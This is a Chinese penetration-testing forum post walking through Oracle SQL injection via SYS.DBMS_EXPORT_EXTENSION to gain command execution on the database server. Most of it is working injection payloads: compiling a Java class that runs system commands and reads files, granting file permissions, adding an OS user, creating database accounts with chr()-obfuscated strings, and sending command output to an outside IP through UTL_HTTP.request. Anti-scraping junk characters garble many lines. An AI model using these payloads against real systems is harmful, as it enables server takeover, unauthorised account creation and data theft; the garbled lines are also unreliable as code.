找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2197|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 3 n0 u3 s) Z6 Y8 p/ C2 J

  T# |, H0 `1 L9 f7 B6 O, ~1 B8 G  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) 0 J" K6 W* y" E" X
的形式即可。(用" 'a'|| "是为了让语句返回true值)
/ N4 J0 |' V9 z2 r语句有点长,可能要用post提交。
& Q) Q6 Q. q9 P# Q# w; n以下是各个步骤: # b  ~" w" ]% P7 Z
1.创建包
# L8 P8 l6 E8 ?5 u通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:
5 k! o- F, c; f$ p* q, x# _* n) e7 u% {/xxx.jsp?id=1 and '1'<>'a'||( ( A) g8 {* u. V/ F2 S
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 W8 C, |: Q9 Jcreate or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
" {2 Q7 o. `( B! x5 n6 enew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}) x1 Y. g4 v$ _
}'''';END;'';END;--','SYS',0,'1',0) from dual ' O, x! D2 h2 ?$ |0 x. `+ s
) # n" E$ M2 D' X% T0 l7 `- A, b+ a- A
------------------------
6 b0 C9 a0 {4 S( r1 m如果url有长度限制,可以把readFile()函数块去掉,即: * {" m% E; f  s- J8 {3 J( T
/xxx.jsp?id=1 and '1'<>'a'||(
$ @) N8 q) L9 |" l& z* qselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', B) i5 |- L$ y$ h" P
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(& \" Z5 V' c; Q: I) k
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}; h7 S, T; a* M! V& M
}'''';END;'';END;--','SYS',0,'1',0) from dual - O7 C; h3 K1 b5 k# i
) % N9 D6 Z, d. u) _# s
同时把后面步骤 提到的 对readFile()的处理语句去掉。
  ^8 t$ W, k3 z* ?+ F------------------------------
4 v5 z- g  }7 T4 w2.赋Java权限 1 y% M2 X  b( F" z0 `* K% l
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
5 C) T4 U! Z; e) e9 C. B3.创建函数 . r6 z/ c1 W+ w2 k
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ X8 n. i4 U1 _  L# j8 }2 Gcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual# u$ y# E+ e$ s5 b2 a9 A
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''  T+ w1 c% ?" k* v3 L/ j
create or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual7 N* E- y% l! q9 Q5 d- p! x9 r2 r
4.赋public执行函数的权限 4 S7 q9 N6 L$ ]
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
. d$ _4 W2 w: q% O' mselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual# h9 z, z; p' S% T3 D% t+ A' ^
5.测试上面的几步是否成功 4 `1 Q& C, u; M/ H3 ^
and '1'<>'11'||(
1 _: @' ^8 v" Y7 E2 I$ {  |6 J& gselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 0 i) p' S2 X1 E
) " L: |, C# Q2 g4 P+ j: ^; u
and '1'<>( : j! S" x% P3 [$ ^" M2 Y
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
/ B. m5 `5 r# c)
7 ?" U& A( o7 u0 p/ ~, u6.执行命令: 1 x+ g' M% Y0 K, u
/xxx.jsp?id=1 and '1'<>( * x* ~( n- Z& i6 ~3 C/ p
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
$ |9 {0 f1 C6 x/ }' V( g. ?& x. m/ g* Q) a
) & x( @! d+ T. z$ F( G, G) [+ F
/xxx.jsp?id=1 and '1'<>( 0 x! T9 E  }+ L! L% M
select  sys.LinxReadFile('c:/boot.ini') from dual9 d* [* {" ~, |$ b
7 k. e, n5 R) w8 u
)& ]( k) ]6 |+ C3 J1 [% Z* Y
  0 y+ s/ u# P( ]) _9 H( @7 I. U# B
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。 3 u) p) S9 Y2 y$ K  a
如果要查看运行结果可以用 union :
* j% z+ x0 c* s, u, l/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
! J8 Y. o5 f: u或者UTL_HTTP.request(:
- s: @" c. h' |) R$ x5 }/xxx.jsp?id=1 and '1'<>(
0 ?7 I, ~, Y. |3 [: b, f/ DSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual: K" x& Y  {1 n7 Y# `8 p$ V/ P
)
5 v) X) D* w& w/xxx.jsp?id=1 and '1'<>( 5 f/ b+ z/ e3 k$ K- R, @  A
SELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual
. q6 q; z1 d/ k) ~& p)
1 K& _8 J" |) \2 N注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。
3 \8 I5 z$ f' z" v+ x% i--------------------
9 Z5 K2 X7 U! Y, x, b" j6.内部变化 / \! i+ @7 [! q3 P: x* ]3 Y
通过以下命令可以查看all_objects表达改变:
' \0 l; g* x. F4 ?3 P! dselect  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'
4 K. G" e8 ?+ O# D0 W) t9 b7.删除我们创建的函数
; m  r) j! ]8 g) L2 b3 u0 X' z. hselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''/ e+ u' _! i1 _& R* Z
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual $ T. j: ^- V" R+ |* j
====================================================
8 z6 I: j# u! _/ J6 B. j5 I2 w9 }全文结束。谨以此文赠与我的朋友。
. G7 J6 @7 S$ T8 ^. }# mlinx
% ]( L" B$ D: s1 u! v8 L* z) H124829445 6 w, S  c- s" z9 r: G. K1 r
2008.1.12
8 J  C9 Q$ P" T* F, d7 qlinyujian@bjfu.edu.cn
4 g! _" u. j: R+ \8 [( m======================================================================
9 d6 Y& ~* E" z; @2 M. E8 j- @测试漏洞的另一方法:
# l' X, B$ ~7 d+ o! H: [创建oracle帐号:
- u1 e5 R, |( T4 wselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. u* v1 U/ D( p+ c8 t/ C0 t9 oCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual$ D- P: l- T! W' F5 ?0 K
即:
: k: D$ @, H6 M5 ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),8 u. A6 u; H3 ?6 o0 D, I- T1 o' S
chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
& v! Y, q" n6 i* \确定漏洞存在: 3 {5 H0 O1 P; l2 Y
1<>(
2 _1 N& O& k. h% Rselect user_id from all_users where username='LINXSQL'
! }: {+ P8 G; v' e7 _)
# Y3 d( |. k# n, ~+ W5 y( \给linxsql连接权限: 5 G8 W1 A+ \- U- F+ G. O
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
" z# w, E7 i; ^$ T: KGRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
/ B0 T6 y: T* g0 S+ x9 w" A6 O. L删除帐号: $ @; N, L' d6 Q0 c  Y9 M" \
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
' h; w7 @9 f# u) Kdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual & C; F2 W6 C8 C7 O$ x) j) E
====================== 8 M1 k# @) D3 ~2 }* o/ l5 E3 A$ o. x
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:9 C; ]- e* K8 u  K
1.jsp?id=1 and '1'<>( " {: d( @7 X  l
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
5 C8 B) K- z" O$ o! Acreate or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
9 A! y' F, ^3 L1 t) u; N; [! s# H- |' d) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE
! Q8 ^# r. c9 u- ~ )
" M" U' ^1 v9 A5 R6 T' u5 h) ^
" \5 d; y% A6 m0 |" p! @) v
1 x5 U6 I" }& M- \% ?4 s' O! Y' V: T9 L; O- R  D
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表